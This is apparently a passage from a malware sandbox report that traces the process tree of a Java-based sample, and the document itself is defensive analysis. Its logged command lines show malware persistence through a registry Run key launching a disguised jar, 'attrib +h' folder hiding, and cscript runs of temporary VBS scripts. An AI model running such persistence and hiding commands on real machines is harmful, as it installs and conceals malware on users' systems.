Commandline:	reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GboKDMbfKti /t REG_EXPAND_SZ /d '\'C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe\' -jar \'C:\Users\user\eDdlsoVKfgW\AknzQIkoyKh.qmSBQy\'' /f
Imagebase:	0x778a0000
File size:	62464 bytes
MD5 hash:	D69A9ABBB0D795F21995C2F48C1EB560
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: attrib.exe PID: 3808 Parent PID: 3348

General

Start time:	09:42:15
Start date:	31/08/2017
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +h 'C:\Users\user\eDdlsoVKfgW\.'
Imagebase:	0x75860000
File size:	16384 bytes
MD5 hash:	459A5755AFBB1CB3E67CA4C1296599E3
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: attrib.exe PID: 3816 Parent PID: 3348

General

Start time:	09:42:16
Start date:	31/08/2017
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +h 'C:\Users\user\eDdlsoVKfgW'
Imagebase:	0x77a20000
File size:	16384 bytes
MD5 hash:	459A5755AFBB1CB3E67CA4C1296599E3
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: javaw.exe PID: 3824 Parent PID: 3348

General

Start time:	09:42:16
Start date:	31/08/2017
Path:	C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\user\eDdlsoVKfgW\AknzQIkoyKh.qmSBQy
Imagebase:	0x77a20000
File size:	191400 bytes
MD5 hash:	C731C96456335BDAA2F58220AE25A202
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: java.exe PID: 3884 Parent PID: 3824

General

Start time:	09:42:17
Start date:	31/08/2017
Path:	C:\Users\user\AppData\Roaming\Oracle\bin\java.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Oracle\bin\java.exe -jar C:\Users\LUKETA~1\AppData\Local\Temp\_0.94322696032766358809744035144248591.class
Imagebase:	0x778a0000
File size:	190888 bytes
MD5 hash:	6F4EB294ACF731771AFE3EF6F7EE812D
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3972 Parent PID: 3824

General

Start time:	09:42:20
Start date:	31/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6799039488535261462.vbs
Imagebase:	0x75860000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cscript.exe PID: 4004 Parent PID: 3972

General

Start time:	09:42:21
Start date:	31/08/2017
Path:	C:\Windows\System32\cscript.exe
Wow64 process (32bit):	false
Commandline:	cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6799039488535261462.vbs
Imagebase:	0x77a20000
File size:	126976 bytes
MD5 hash:	A3A35EE79C64A640152B3113E6E254E2
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 4052 Parent PID: 3884

General

Start time:	09:42:22
Start date:	31/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6418174406144645399.vbs
Imagebase:	0x77a20000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cscript.exe PID: 4092 Parent PID: 4052

General

Start time:	09:42:22
Start date:	31/08/2017
Path:	C:\Windows\System32\cscript.exe
Wow64 process (32bit):	false
Commandline:	cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6418174406144645399.vbs
Imagebase:	0x77a20000
File size:	126976 bytes
MD5 hash:	A3A35EE79C64A640152B3113E6E254E2
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 1780 Parent PID: 3824

General

Start time:	09:42:23
Start date:	31/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3450254285310729085.vbs
Imagebase:	0x77a20000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cscript.exe PID: 2196 Parent PID: 1780

General

Start time:	09:42:23
Start date:	31/08/2017
Path:	C:\Windows\System32\cscript.exe
Wow64 process (32bit):	false
Commandline:	cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3450254285310729085.vbs
Imagebase:	0x778a0000
File size:	126976 bytes
MD5 hash:	A3A35EE79C64A640152B3113E6E254E2
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 1964 Parent PID: 3884

General

Start time:	09:42:25
Start date:	31/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2857528709846908978.vbs
Imagebase:	0x778a0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 1656 Parent PID: 3824

General

Start time:	09:42:25
Start date:	31/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe
Imagebase:	0x778a0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cscript.exe PID: 2056 Parent PID: 1964

General

Start time:	09:42:25
Start date:	31/08/2017
Path:	C:\Windows\System32\cscript.exe
Wow64 process (32bit):	false
Commandline:	cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2857528709846908978.vbs
Imagebase:	0x75860000
File size:	126976 bytes
MD5 hash:	A3A35EE79C64A640152B3113E6E254E2
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

DDoS:

Software Vulnerabilities:

Networking:

Boot Survival:

Remote Access Functionality:

Persistence and Installation Behavior:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Lowering of HIPS / PFW / Operating System Security Settings:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Domains

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: cmd.exe PID: 3256 Parent PID: 2780

General

Analysis Process: 7za.exe PID: 3264 Parent PID: 3256

General

Analysis Process: cmd.exe PID: 3324 Parent PID: 2780

General

Analysis Process: java.exe PID: 3348 Parent PID: 3324

General

Analysis Process: java.exe PID: 3396 Parent PID: 3348

General

Analysis Process: cmd.exe PID: 3468 Parent PID: 3348

General

Analysis Process: cscript.exe PID: 3476 Parent PID: 3468